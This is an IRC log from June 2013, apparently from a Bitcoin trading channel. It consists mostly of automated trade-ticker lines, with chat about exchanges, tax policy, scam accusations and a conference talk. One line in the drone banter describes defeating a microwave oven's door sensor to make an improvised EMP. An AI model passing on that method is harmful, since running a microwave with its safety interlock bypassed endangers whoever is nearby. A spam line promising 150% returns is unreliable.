1.8762 BTC [+] Jun 22 02:53:13 [HAVELOCK] [HIM] 1 @ 0.285 BTC [+] Jun 22 02:56:36 [BTCTC] [ASICMINER-PT] 1 @ 3.131 BTC [-] Jun 22 02:57:10 [BTCTC] [TAT.ASICMINER] 4 @ 0.031289 = 0.1252 BTC [-] Jun 22 02:57:29 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 22 02:58:02 [HAVELOCK] [ASICM] 76 @ 0.031538 = 2.3969 BTC [-] Jun 22 02:58:21 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 22 03:00:02 [HAVELOCK] [ASICM] 1 @ 0.031598 BTC [+] Jun 22 03:00:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.031388 BTC [+] Jun 22 03:00:16 [BTCTC] [TAT.ASICMINER] 46 @ 0.031289 = 1.4393 BTC [-] Jun 22 03:00:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.031288 BTC [-] Jun 22 03:02:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.0317 BTC [+] Jun 22 03:02:18 [BTCTC] [TAT.ASICMINER] 1 @ 0.031799 BTC [+] Jun 22 03:03:45 [BTCTC] [TAT.ASICMINER] 50 @ 0.031787 = 1.5894 BTC [-] Jun 22 03:09:23 [HAVELOCK] [ASICM] 8 @ 0.0314 = 0.2512 BTC [-] Jun 22 03:11:31 [HAVELOCK] [ASICM] 1 @ 0.03040002 BTC [-] Jun 22 03:14:48 [HAVELOCK] [ASICM] 7 @ 0.031598 = 0.2212 BTC [+] Jun 22 03:19:03 [HAVELOCK] [ASICM] 2 @ 0.031598 = 0.0632 BTC [+] Jun 22 03:26:41 [BTCTC] [PAJKA.BOND] 1 @ 0.04999 BTC [-] Jun 22 03:26:43 [BTCTC] [PAJKA.BOND] 4 @ 0.05 = 0.2 BTC [+] Jun 22 03:28:53 [BTCTC] [BASIC-MINING] 1 @ 1.493 BTC [-] Jun 22 03:29:01 [BTCTC] [S.DICE-PT] 13 @ 0.00272 = 0.0354 BTC [+] Jun 22 03:31:48 [HAVELOCK] [ASICM] 113 @ 0.031598 = 3.5706 BTC [+] Jun 22 03:33:23 [BTCTC] [TAT.ASICMINER] 50 @ 0.030989 = 1.5495 BTC [-] Jun 22 03:38:02 [HAVELOCK] [ASICM] 1 @ 0.031599 BTC [+] Jun 22 03:40:50 [BTCTC] [B.YABMC] 94 @ 0.009 = 0.846 BTC [+] Jun 22 03:41:28 [BTCTC] [ASICMINER-PT] 1 @ 3.2498 BTC [+] Jun 22 03:41:44 [BTCTC] [B.YABMC] 50 @ 0.009999 = 0.5 BTC [+] Jun 22 03:42:15 [HAVELOCK] [ASICM] 4 @ 0.031599 = 0.1264 BTC [+] Jun 22 03:43:17 [BTCTC] [PAJKA.BOND] 25 @ 0.05 = 1.25 BTC [+] Jun 22 03:44:11 [BTCTC] [PAJKA.BOND] 14 @ 0.058999 = 0.826 BTC [+] Jun 22 03:44:28 [HAVELOCK] [ASICM] 8 @ 0.031598 = 0.2528 BTC [-] Jun 22 03:44:55 [BTCTC] [PAJKA.BOND] 7 @ 0.058999 = 0.413 BTC [+] Jun 22 03:44:57 [BTCTC] [PAJKA.BOND] 3 @ 0.059 = 0.177 BTC [+] Jun 22 03:45:20 [HAVELOCK] [ASICM] 100 @ 0.031598 = 3.1598 BTC [-] Jun 22 03:45:47 [BTCTC] [TAT.ASICMINER] 30 @ 0.030989 = 0.9297 BTC [-] Jun 22 03:45:58 [BTCTC] [PAJKA.BOND] 7 @ 0.059 = 0.413 BTC [+] Jun 22 03:46:03 [BTCTC] [ASICMINER-PT] 2 @ 3.2 = 6.4 BTC [-] Jun 22 03:46:41 [BTCTC] [PAJKA.BOND] 14 @ 0.06 = 0.84 BTC [+] Jun 22 03:47:40 [BTCTC] [TAT.ASICMINER] 26 @ 0.031683 = 0.8238 BTC [+] Jun 22 03:48:18 [BTCTC] [TAT.ASICMINER] 15 @ 0.031684 = 0.4753 BTC [+] Jun 22 03:48:29 [HAVELOCK] [ASICM] 17 @ 0.031598 = 0.5372 BTC [-] Jun 22 03:49:30 [BTCTC] [BTC-BOND] 29 @ 0.009997 = 0.2899 BTC [+] Jun 22 03:49:31 [BTCTC] [BTC-BOND] 10 @ 0.009997 = 0.1 BTC [+] Jun 22 03:49:33 [BTCTC] [BTC-BOND] 2 @ 0.009997 = 0.02 BTC [+] Jun 22 03:49:40 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Jun 22 03:49:43 [BTCTC] [TAT.ASICMINER] 35 @ 0.031684 = 1.1089 BTC [+] Jun 22 03:50:05 [HAVELOCK] [ASICM] 28 @ 0.031598 = 0.8847 BTC [-] Jun 22 03:50:20 [BTCTC] [BTC-BOND] 65 @ 0.009998 = 0.6499 BTC [+] Jun 22 03:51:20 [BTCTC] [ASICMINER-PT] 1 @ 3.254 BTC [+] Jun 22 03:52:32 [BTCTC] [DMS.MINING] 3 @ 0.0155 = 0.0465 BTC [-] Jun 22 03:53:16 [BTCTC] [DMS.MINING] 101 @ 0.015673 = 1.583 BTC [+] Jun 22 03:53:31 [HAVELOCK] [VTX] 7 @ 0.423021 = 2.9611 BTC [-] Jun 22 03:56:22 [BTCTC] [MININGCO.ETF] 1 @ 0.8299 BTC [+] Jun 22 03:58:53 [HAVELOCK] [ASICM] 1 @ 0.0316 BTC [+] Jun 22 03:59:15 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005439 = 0.272 BTC [-] Jun 22 04:00:52 [BTCTC] [DMS.PURCHASE] 1 @ 0.054282 BTC [-] Jun 22 04:01:46 [BTCTC] [DMS.SELLING] 1 @ 0.0388 BTC [+] Jun 22 04:04:37 [BTCTC] [S.BBET-PT] 1 @ 0.00187 BTC [-] Jun 22 04:05:29 [BTCTC] [S.MPOE-PT] 1 @ 0.00078 BTC [+] Jun 22 04:07:47 [BTCTC] [TAT.ASICMINER] 1 @ 0.031688 BTC [+] Jun 22 04:07:49 [BTCTC] [TAT.ASICMINER] 14 @ 0.031688 = 0.4436 BTC [+] Jun 22 04:11:08 [MPEX] [S.MPOE] 11405 @ 0.00078489 = 8.9517 BTC [-] Jun 22 04:15:04 [BTCTC] [TAT.ASICMINER] 36 @ 0.031688 = 1.1408 BTC [+] Jun 22 04:20:19 [BTCTC] [TAT.ASICMINER] 5 @ 0.031388 = 0.1569 BTC [-] Jun 22 04:20:21 [BTCTC] [TAT.ASICMINER] 19 @ 0.03129 = 0.5945 BTC [-] Jun 22 04:24:48 [MPEX] [S.MPOE] 2900 @ 0.00078497 = 2.2764 BTC [+] Jun 22 04:24:50 [MPEX] [S.MPOE] 5121 @ 0.00078501 = 4.02 BTC [+] Jun 22 04:25:08 [MPEX] [S.MPOE] 1579 @ 0.00078579 = 1.2408 BTC [+] Jun 22 04:31:41 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.0048 = 0.0192 BTC [-] Jun 22 04:33:56 [BTCTC] [TAT.ASICMINER] 3 @ 0.031888 = 0.0957 BTC [+] Jun 22 04:35:28 [BTCTC] [TAT.ASICMINER] 10 @ 0.031388 = 0.3139 BTC [-] Jun 22 04:36:46 [BTCTC] [TAT.ASICMINER] 19 @ 0.031388 = 0.5964 BTC [-] Jun 22 04:37:42 [BTCTC] [TAT.ASICMINER] 15 @ 0.031388 = 0.4708 BTC [-] Jun 22 04:38:53 [BTCTC] [TAT.ASICMINER] 62 @ 0.031388 = 1.9461 BTC [-] Jun 22 04:39:02 [BTCTC] [ASICMINER-PT] 2 @ 3.248 = 6.496 BTC [-] Jun 22 04:46:52 [BTCTC] [ASICMINER-PT] 1 @ 3.247 BTC [-] Jun 22 04:46:54 [BTCTC] [ASICMINER-PT] 3 @ 3.248 = 9.744 BTC [+] Jun 22 04:46:56 [BTCTC] [ASICMINER-PT] 1 @ 3.248979 BTC [+] Jun 22 04:46:58 [BTCTC] [ASICMINER-PT] 1 @ 3.2495 BTC [+] Jun 22 04:47:02 [BTCTC] [ASICMINER-PT] 1 @ 3.2498 BTC [+] Jun 22 04:47:51 [BTCTC] [ASICMINER-PT] 1 @ 3.25 BTC [+] Jun 22 04:49:25 [BTCTC] [TAT.ASICMINER] 30 @ 0.031388 = 0.9416 BTC [-] Jun 22 04:51:49 [BTCTC] [ASICMINER-PT] 1 @ 3.254 BTC [+] Jun 22 04:51:51 [BTCTC] [ASICMINER-PT] 1 @ 3.255 BTC [+] Jun 22 04:51:52 [BTCTC] [ASICMINER-PT] 1 @ 3.256 BTC [+] Jun 22 04:51:54 [BTCTC] [ASICMINER-PT] 1 @ 3.2575 BTC [+] Jun 22 04:51:55 [BTCTC] [ASICMINER-PT] 1 @ 3.259 BTC [+] Jun 22 04:51:56 [BTCTC] [ASICMINER-PT] 1 @ 3.27 BTC [+] Jun 22 04:51:57 [BTCTC] [ASICMINER-PT] 1 @ 3.27 BTC [+] Jun 22 04:51:58 [BTCTC] [ASICMINER-PT] 1 @ 3.27 BTC [+] Jun 22 04:52:00 [BTCTC] [ASICMINER-PT] 2 @ 3.271 = 6.542 BTC [+] Jun 22 04:52:03 [BTCTC] [ASICMINER-PT] 1 @ 3.272 BTC [+] Jun 22 04:52:05 [BTCTC] [ASICMINER-PT] 2 @ 3.273 = 6.546 BTC [+] Jun 22 04:52:06 [BTCTC] [ASICMINER-PT] 1 @ 3.274 BTC [+] Jun 22 04:52:08 [BTCTC] [ASICMINER-PT] 1 @ 3.278 BTC [+] Jun 22 04:52:09 [BTCTC] [ASICMINER-PT] 2 @ 3.279 = 6.558 BTC [+] Jun 22 04:52:52 [MPEX] [S.MPOE] 1895 @ 0.00078489 = 1.4874 BTC [-] Jun 22 04:52:53 [MPEX] [S.MPOE] 2407 @ 0.00078475 = 1.8889 BTC [-] Jun 22 04:53:20 [BTCTC] [TAT.ASICMINER] 60 @ 0.03188 = 1.9128 BTC [+] Jun 22 04:58:38 [BTCTC] [TAT.ASICMINER] 6 @ 0.03185 = 0.1911 BTC [-] Jun 22 04:59:48 [BTCTC] [GSDPT] 1 @ 0.002151 BTC [+] Jun 22 05:02:13 Bestemoneys.com - portal about e-currencies that pays 150% return per Share. Jun 22 05:02:20 bestbest Jun 22 05:02:32 best about best that bests better Jun 22 05:05:29 [BTCTC] [DMS.SELLING] 1 @ 0.037231 BTC [-] Jun 22 05:09:49 [BTCTC] [ASICMINER-PT] 1 @ 3.1708 BTC [-] Jun 22 05:09:51 [BTCTC] [ASICMINER-PT] 1 @ 3.170701 BTC [-] Jun 22 05:09:53 [BTCTC] [ASICMINER-PT] 1 @ 3.170503 BTC [-] Jun 22 05:09:55 [BTCTC] [ASICMINER-PT] 1 @ 3.170503 BTC [-] Jun 22 05:10:41 [BTCTC] [ASICMINER-PT] 1 @ 3.170503 BTC [-] Jun 22 05:11:47 [BTCTC] [TAT.ASICMINER] 32 @ 0.031331 = 1.0026 BTC [-] Jun 22 05:16:07 ...and then there was this huge explosion and all the money just rained down like it was a storm in Florida. It was hillarious. Jun 22 05:28:45 [BTCTC] [TAT.ASICMINER] 8 @ 0.031799 = 0.2544 BTC [+] Jun 22 05:32:31 [BTCTC] [ASICMINER-PT] 1 @ 3.26 BTC [+] Jun 22 05:33:29 [BTCTC] [ASICMINER-PT] 1 @ 3.2618 BTC [+] Jun 22 05:36:16 [BTCTC] [TAT.ASICMINER] 25 @ 0.0317 = 0.7925 BTC [-] Jun 22 05:36:19 [BTCTC] [TAT.ASICMINER] 24 @ 0.031799 = 0.7632 BTC [+] Jun 22 05:36:21 [BTCTC] [TAT.ASICMINER] 50 @ 0.0318 = 1.59 BTC [+] Jun 22 05:36:22 [BTCTC] [TAT.ASICMINER] 9 @ 0.03185 = 0.2867 BTC [+] Jun 22 05:36:24 [BTCTC] [TAT.ASICMINER] 6 @ 0.03185 = 0.1911 BTC [+] Jun 22 05:36:25 [BTCTC] [TAT.ASICMINER] 50 @ 0.0319 = 1.595 BTC [+] Jun 22 05:36:25 [BTCTC] [TAT.ASICMINER] 12 @ 0.032 = 0.384 BTC [+] Jun 22 05:36:27 [BTCTC] [TAT.ASICMINER] 10 @ 0.032101 = 0.321 BTC [+] Jun 22 05:36:28 [BTCTC] [TAT.ASICMINER] 2 @ 0.0323 = 0.0646 BTC [+] Jun 22 05:36:29 [BTCTC] [TAT.ASICMINER] 5 @ 0.032489 = 0.1624 BTC [+] Jun 22 05:36:30 [BTCTC] [TAT.ASICMINER] 57 @ 0.03249 = 1.8519 BTC [+] Jun 22 05:40:20 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [-] Jun 22 05:40:21 [BTCTC] [BASIC-MINING] 1 @ 1.49 BTC [-] Jun 22 05:41:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0049 BTC [+] Jun 22 05:41:17 [BTCTC] [TAT.VIRTUALMINE] 44 @ 0.004999 = 0.22 BTC [+] Jun 22 05:48:45 [BTCTC] [S.BBET-PT] 9 @ 0.00188 = 0.0169 BTC [+] **** BEGIN LOGGING AT Sat Jun 22 13:47:38 2013 Jun 22 13:48:49 [MPEX] [S.MPOE] 6100 @ 0.00077809 = 4.7463 BTC [+] Jun 22 13:48:57 [MPEX] [S.MPOE] 4950 @ 0.00077589 = 3.8407 BTC [-] Jun 22 13:50:06 [BTCTC] [S.DICE-PT] 100 @ 0.002571 = 0.2571 BTC [-] Jun 22 13:50:15 Watching the Yifu video Jun 22 13:50:29 [BTCTC] [DMS.SELLING] 20 @ 0.039 = 0.78 BTC [+] Jun 22 13:50:31 [BTCTC] [DMS.SELLING] 20 @ 0.039 = 0.78 BTC [+] Jun 22 13:50:35 he handles the "are you mining" question pretty well Jun 22 13:54:51 what's he say ? Jun 22 13:58:23 i recommend watching the video Jun 22 13:58:25 its not bad Jun 22 13:58:34 he goes into some other intersting stuff Jun 22 13:58:40 https://www.youtube.com/watch?v=LY1xgGiejIc&list=PLUOP0P68GJ3BGjfqoLLnzAefk3ZzXQtJ7&index=2 Jun 22 13:58:47 Bitcoin 2013 conference - Yifu Guo - Avalon ASIC - YouTube Jun 22 13:59:41 [BTCTC] [TAT.ASICMINER] 12 @ 0.030553 = 0.3666 BTC [-] Jun 22 13:59:43 [BTCTC] [TAT.ASICMINER] 50 @ 0.030552 = 1.5276 BTC [-] Jun 22 13:59:44 [BTCTC] [TAT.ASICMINER] 13 @ 0.03055 = 0.3972 BTC [-] Jun 22 13:59:45 [BTCTC] [TAT.ASICMINER] 24 @ 0.030511 = 0.7323 BTC [-] Jun 22 14:02:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [+] Jun 22 14:14:27 dont need flash for youtube Jun 22 14:15:09 pretty sure they fixed that like 2 years ago, no? Jun 22 14:17:04 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [+] Jun 22 14:17:05 [BTCTC] [COGNITIVE] 1 @ 0.3 BTC [+] Jun 22 14:17:29 http://www.gao.gov/multimedia/podcasts/654442 Jun 22 14:17:32 U.S. GAO - Government Accountability Office (GAO) Podcast: Watchdog Report Jun 22 14:17:43 not that long, or special Jun 22 14:17:44 but Jun 22 14:18:06 essentially officially recommending the IRS address and clarify bitocin tax issues Jun 22 14:18:46 mostly they talk about it as being like a foreign currency, rather than a barter Jun 22 14:19:47 obviously the us will soon come up with conflicting definitions for btc Jun 22 14:19:55 specifically, each dept using the one most convenient. Jun 22 14:20:41 "it's not a currency if you want your govt job to pay bitcoin. it is a currency if you need to pay tax on it. it isn't a currency if you wish to pay tax in it. it is a currency etc" Jun 22 14:21:05 ugh Jun 22 14:21:21 " it's a 25 min long talk by yifu guo avalon guy, who so far talks like a 14yo." Jun 22 14:21:33 ThickAsThieves is this proves not worth it ima dock ya. Jun 22 14:21:33 its not that bad Jun 22 14:21:43 i don't care, not my time. Jun 22 14:22:43 its easily better than every other conference video i watch Jun 22 14:22:48 i know that isnt saying much... Jun 22 14:23:09 every other bitcoin* conference video* Jun 22 14:25:06 [BTCTC] [COGNITIVE] 10 @ 0.302195 = 3.022 BTC [+] Jun 22 14:25:34 re: TAT.VIRTUALMINE "Not much confidence in the asset out there.. TAT needs to do something to save this asset or else its goin down.. hard.." Jun 22 14:25:46 I guess I need to save the mining industry Jun 22 14:25:50 ideas? Jun 22 14:26:13 surely every solution this person thinks is good involves me giving him something for free Jun 22 14:32:52 [HAVELOCK] [HIM] 2 @ 0.28 = 0.56 BTC [-] Jun 22 14:36:23 [MPEX] [S.MPOE] 5300 @ 0.00077921 = 4.1298 BTC [+] Jun 22 14:41:13 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00509 BTC [+] Jun 22 14:45:36 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005099 BTC [+] Jun 22 14:47:45 [BTCTC] [ASICMINER-PT] 1 @ 3.128997 BTC [+] Jun 22 14:47:46 [BTCTC] [ASICMINER-PT] 1 @ 3.128998 BTC [+] Jun 22 14:50:47 http://www.reddit.com/r/IAmA/comments/1ch7wb/starting_with_almost_nothing_i_made_almost_500000/ Jun 22 14:50:51 Starting with almost nothing, I made almost $500,000 gambling with Bitcoin. I then lost it all in ab Jun 22 14:50:53 reddit delivers unexpectedly Jun 22 14:51:16 [BTCTC] [DMS.MINING] 1 @ 0.015907 BTC [+] Jun 22 14:51:44 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jun 22 14:53:42 [BTCTC] [DMS.SELLING] 10 @ 0.0392 = 0.392 BTC [+] Jun 22 14:54:26 [BTCTC] [DMS.SELLING] 30 @ 0.0395 = 1.185 BTC [+] Jun 22 14:55:22 you gotta know when to hold em... Jun 22 14:55:56 [BTCTC] [DMS.PURCHASE] 20 @ 0.054282 = 1.0856 BTC [-] Jun 22 14:57:10 [BTCTC] [DMS.MINING] 1 @ 0.015908 BTC [+] Jun 22 14:57:16 [BTCTC] [TAT.ASICMINER] 1 @ 0.031379 BTC [+] Jun 22 15:00:46 yifu guo talking about avalon. not the worst speaker ever but does show Jun 22 15:00:46 his age (16? 17?) a little. Jun 22 15:00:51 ok so how old is this guy already. Jun 22 15:01:26 my guess is 20 Jun 22 15:02:14 aha. so sabotage huh ? Jun 22 15:02:35 i think that part is nonsense Jun 22 15:02:56 probly just a forklift inaccuracy Jun 22 15:04:02 so does he like or does he not like the customer base ? Jun 22 15:04:54 he likes the ones that he doesnt consider to be greedy Jun 22 15:04:59 so, no Jun 22 15:05:00 hehe Jun 22 15:05:07 lol Jun 22 15:05:13 anyway. Jun 22 15:11:22 [BTCTC] [PAJKA.BOND] 1 @ 0.048501 BTC [-] Jun 22 15:11:24 [BTCTC] [PAJKA.BOND] 1 @ 0.0485 BTC [-] Jun 22 15:11:26 do you even forklift Jun 22 15:11:41 me? Jun 22 15:12:08 like all the time **** BEGIN LOGGING AT Sat Jun 22 15:21:38 2013 Jun 22 15:22:37 [BTCTC] [DMS.MINING] 20 @ 0.015908 = 0.3182 BTC [+] Jun 22 15:23:16 [HAVELOCK] [HIM] 1 @ 0.275 BTC [-] Jun 22 15:23:24 [HAVELOCK] [HIM] 1 @ 0.273 BTC [-] Jun 22 15:23:34 [HAVELOCK] [HIM] 7 @ 0.272 = 1.904 BTC [-] Jun 22 15:23:49 [HAVELOCK] [HIM] 10 @ 0.2715 = 2.715 BTC [-] Jun 22 15:25:24 [BTCTC] [TAT.ASICMINER] 13 @ 0.0314 = 0.4082 BTC [+] Jun 22 15:30:21 [BTCTC] [DMS.MINING] 4 @ 0.015908 = 0.0636 BTC [+] Jun 22 15:30:23 [BTCTC] [DMS.MINING] 31 @ 0.01591 = 0.4932 BTC [+] Jun 22 15:30:35 [BTCTC] [TAT.ASICMINER] 38 @ 0.031498 = 1.1969 BTC [+] Jun 22 15:32:08 [BTCTC] [COGNITIVE] 6 @ 0.3 = 1.8 BTC [-] Jun 22 15:32:36 [BTCTC] [TAT.ASICMINER] 11 @ 0.031498 = 0.3465 BTC [+] Jun 22 15:32:37 [BTCTC] [TAT.ASICMINER] 57 @ 0.031499 = 1.7954 BTC [+] Jun 22 15:32:39 [BTCTC] [TAT.ASICMINER] 16 @ 0.0315 = 0.504 BTC [+] Jun 22 15:32:41 [BTCTC] [DMS.MINING] 109 @ 0.01591 = 1.7342 BTC [+] Jun 22 15:42:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.0315 = 0.063 BTC [+] Jun 22 15:43:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.0315 BTC [+] Jun 22 15:45:01 [BTCTC] [DMS.MINING] 50 @ 0.01648 = 0.824 BTC [+] Jun 22 15:45:03 [BTCTC] [DMS.MINING] 170 @ 0.01649 = 2.8033 BTC [+] Jun 22 15:48:29 [HAVELOCK] [ASICM] 4 @ 0.0301002 = 0.1204 BTC [-] Jun 22 15:48:30 [HAVELOCK] [ASICM] 3 @ 0.0301001 = 0.0903 BTC [-] Jun 22 15:48:31 [HAVELOCK] [ASICM] 10 @ 0.0301 = 0.301 BTC [-] Jun 22 15:48:33 [HAVELOCK] [ASICM] 11 @ 0.0301 = 0.3311 BTC [-] Jun 22 15:48:33 [HAVELOCK] [ASICM] 139 @ 0.030051 = 4.1771 BTC [-] Jun 22 15:48:34 [HAVELOCK] [ASICM] 27 @ 0.03 = 0.81 BTC [-] Jun 22 15:48:35 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [-] Jun 22 15:48:36 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [-] Jun 22 15:50:23 [BTCTC] [COGNITIVE] 1 @ 0.302198 BTC [+] Jun 22 15:52:24 [HAVELOCK] [ASICM] 4 @ 0.03 = 0.12 BTC [-] Jun 22 15:55:20 [BTCTC] [ASICMINER-PT] 1 @ 3.136 BTC [+] Jun 22 15:55:35 [BTCTC] [CRYPTO-TRADE] 7 @ 0.2 = 1.4 BTC [+] Jun 22 16:02:04 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [-] Jun 22 16:02:05 [HAVELOCK] [ASICM] 1 @ 0.029899 BTC [-] Jun 22 16:02:07 [HAVELOCK] [ASICM] 2 @ 0.0298 = 0.0596 BTC [-] Jun 22 16:02:08 [HAVELOCK] [ASICM] 3 @ 0.0295 = 0.0885 BTC [-] Jun 22 16:02:09 [HAVELOCK] [ASICM] 35 @ 0.0295 = 1.0325 BTC [-] Jun 22 16:05:45 mjr_ http://trilema.com/2013/the-rarge-part-of-this-lally/ recall ? :D Jun 22 16:05:58 coinbase was driving rallies back then. whar is it nao ? Jun 22 16:09:50 ;;seen mod6 Jun 22 16:10:00 mircea_popescu: how are you? Jun 22 16:10:17 can I get some more credits? Jun 22 16:10:32 i think so! Jun 22 16:10:48 1 sec Jun 22 16:18:45 [HAVELOCK] [ASICM] 39 @ 0.031378 = 1.2237 BTC [+] Jun 22 17:05:52 any news on btct.co being down? Jun 22 17:06:41 [HAVELOCK] [SDICE] 2 @ 0.20002001 = 0.4 BTC [+] Jun 22 17:09:55 it is ? Jun 22 17:10:18 !t btctc asicminer-pt Jun 22 17:10:35 Hell, ain't we about more fucked than a whore at closin' time, huh? Jun 22 17:10:36 its down :S Jun 22 17:10:49 who ran that one Jun 22 17:11:03 burnside Jun 22 17:11:19 ah right. not here. Jun 22 17:11:22 so what is it, ddos ? Jun 22 17:11:32 otc website was getting it yest pretty bad. Jun 22 17:11:40 [HAVELOCK] [ASICM] 1 @ 0.0296 BTC [-] Jun 22 17:11:40 [HAVELOCK] [ASICM] 4 @ 0.029505 = 0.118 BTC [-] Jun 22 17:11:40 [HAVELOCK] [ASICM] 7 @ 0.0295001 = 0.2065 BTC [-] Jun 22 17:11:40 [HAVELOCK] [ASICM] 104 @ 0.0295 = 3.068 BTC [-] Jun 22 17:11:40 [HAVELOCK] [ASICM] 384 @ 0.0291 = 11.1744 BTC [-] Jun 22 17:22:12 ah, so that's why gribble is gone Jun 22 17:24:10 possibly Jun 22 17:24:46 [HAVELOCK] [ASICM] 100 @ 0.0291 = 2.91 BTC [-] Jun 22 17:26:10 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [+] Jun 22 17:34:12 [HAVELOCK] [ASICM] 1 @ 0.0294 BTC [-] Jun 22 17:34:13 [HAVELOCK] [ASICM] 1 @ 0.0294 BTC [-] Jun 22 17:34:14 [HAVELOCK] [ASICM] 98 @ 0.0292 = 2.8616 BTC [-] Jun 22 17:35:18 [HAVELOCK] [HIM] 1 @ 0.272 BTC [+] Jun 22 17:48:11 [HAVELOCK] [ASICM] 1 @ 0.03 BTC [+] Jun 22 18:00:04 https://bitcointalk.org/index.php?topic=240552.0 Jun 22 18:00:08 ThickAsThieves abusing feedback system to silence critics. Please remove Jun 22 18:00:09 scam! Jun 22 18:02:06 good thing scammer tags are a myth Jun 22 18:02:07 phew! Jun 22 18:08:14 [HAVELOCK] [ASICM] 101 @ 0.031007 = 3.1317 BTC [+] Jun 22 18:17:33 I like how the market is ignoring the currently inflated Goxprice Jun 22 18:17:44 everywhere else is like $5+ lower Jun 22 18:23:46 [MPEX] [S.MPOE] 10350 @ 0.00077589 = 8.0305 BTC [-] Jun 22 18:33:14 my scam accuser, caught scamming: https://bitcointalk.org/index.php?topic=99497.msg2550077#msg2550077 Jun 22 18:38:03 scammers scamming scammers! Jun 22 18:38:07 lol Jun 22 18:38:25 ThickAsThieves basically gox dollars are worthless atm Jun 22 19:06:49 [HAVELOCK] [ASICM] 27 @ 0.029211 = 0.7887 BTC [-] Jun 22 19:15:49 ;;next Jun 22 19:16:11 Gribble MIA? Dang... Jun 22 19:18:30 The oracle is still targeting 88, same as two weeks ago. Why, coming from an oracle, isn't that always 100% true? I mean, I'm losing money here, where can I has BTC for 88??????? The Oracle is a scam! Jun 22 19:20:15 totally. Jun 22 19:21:24 https://bitcointalk.org/index.php?topic=231960.msg2550447#msg2550447 Jun 22 19:21:28 prolly should be mandatory reading. Jun 22 19:21:30 MtGox wires ARE delayed Jun 22 19:22:17 ozbot what are you doing? Jun 22 19:22:22 .h Jun 22 19:22:22 All commands can be processed in channel or in PM Jun 22 19:22:23 Commands: .bait .count .diff .earn .exchange .nethash .rates .lcrates .tslb Jun 22 19:22:38 where's the 'is gox hosed' command? Jun 22 19:23:02 heh Jun 22 19:23:04 .r Jun 22 19:23:08 Gox | Buy: $109.00 Sell: $109.00 Last: $109.00 High: $111.44 Low: $107.51 Jun 22 19:23:08 Weex | API Error Jun 22 19:23:10 ^ that one will tell you :) Jun 22 19:23:15 their api seems to be up Jun 22 19:23:30 gribble has goxlag Jun 22 19:23:31 talkin bout dis, Jezz: Jun 22 19:23:31 MtGox wires ARE delayed Jun 22 19:23:44 oh, that was just a title from the link posted Jun 22 19:26:01 i have since grepped logs and now understand thing Jun 22 19:26:31 in other news, nobody is safe from the robocar assasination. Jun 22 19:27:20 i put on my tinfoil hat this morning reading about the US journo who died in a firey carsplosion and came to the conclusion that even refusing to drive roboticized cars won't really help you stay safe in america anymore Jun 22 19:27:27 i wonder how long before the first drone assasination goes bad, victim destroys drone. Jun 22 19:27:59 im certainly shooting any small flying objects before asking any questions. Jun 22 19:28:23 we'll see if it was just some innocent radio model once we dissect the wreckage Jun 22 19:29:05 you should move into territory controlled by the distributed peoples republic of cascadia Jun 22 19:29:15 make some voluntary tax payments Jun 22 19:29:22 and enjoy their swarm legal enforcement Jun 22 19:29:40 nodes must declare trajectories and get those trajectories vetted by the swarm Jun 22 19:29:58 heh Jun 22 19:30:03 deviations from trajectories or implementation of rejected trajectories results in swarm nuking bad nodes Jun 22 19:41:53 Getting droned on U.S. soil is a kind of wankfantasy apotheosis for political crackpots. It is like asking to be beheaded by the caliph personally. hardly anyone is worthy of that level of attention. Jun 22 19:42:49 the most accomplished troublemakers should hope for, at most, cut brake cables. or a tragic bathtub slip. Jun 22 19:44:38 this is true. Jun 22 19:46:24 re: compact drones: we are unlikely to see small arms on man-portable flying machines, because Newton's 3rd Law. Plastique is another matter. Jun 22 19:48:02 in the swarm scenario, the only weapon that might save you is a fully-automatic shotgun and a full crate of shells. even so, only one machine needs to get lucky and come within range. Jun 22 19:48:25 asciilifeform : http://trilema.com/2013/since-you-boys-are-printing-tanks-now/ Jun 22 19:48:31 automated battery! Jun 22 19:48:37 EMP is a more likely countermeasure. It is quite impossible to adequately shield a small flyer against EM. Jun 22 19:50:02 12 gauge copper cabling everywhere. Jun 22 19:50:46 re: the link: reminds me of the old (1970s?) MIT fly swatter. a low-power beam is bounced around a room with mirrors. it terminates on a photocell. if the beam is broken, the laser goes from 5mW to 5W for 100ms or so. Jun 22 19:51:08 yeah! Jun 22 19:53:47 for short-range EMP, the Serbian method ought to work: ordinary kitchen microwaves with a stick jamming the door sensor. Jun 22 19:53:56 "If a barking dog disturbs your meditation, it is better to shoot the dog than to let yourself be disturbed" - Paraphrased from Aleister Crowley Jun 22 19:54:31 ...and that doesn't actually say what you think it says. Jun 22 19:54:57 mircea_popescu: didn't you once describe living out exactly this incident? Jun 22 19:55:31 [MPEX] [S.MPOE] 15156 @ 0.00077589 = 11.7594 BTC [-] Jun 22 19:55:33 which you mean ? Jun 22 19:55:39 [MPEX] [S.MPOE] 13650 @ 0.00077529 = 10.5827 BTC [-] Jun 22 19:55:40 a barking dog Jun 22 19:55:40 [MPEX] [S.MPOE] 3100 @ 0.00077511 = 2.4028 BTC [-] Jun 22 19:55:43 and a '45 Jun 22 19:55:44 yeah Jun 22 19:56:28 from what i recall the magazine was described, not the caliber. Jun 22 19:57:16 Well, if MP shot the dog, he missed the point :-) Jun 22 19:58:42 if i'm shooting there's going to be missing, but i won't be doing it. Jun 22 19:59:07 hi can anyone explain to me what 'ministry of games' does? thank you i am looking to buy shares Jun 22 19:59:09 Hehe :-) Jun 22 19:59:23 on the website trilema the explanation is vague Jun 22 19:59:29 bitcoin935 it aims to develop/publish bitcoin 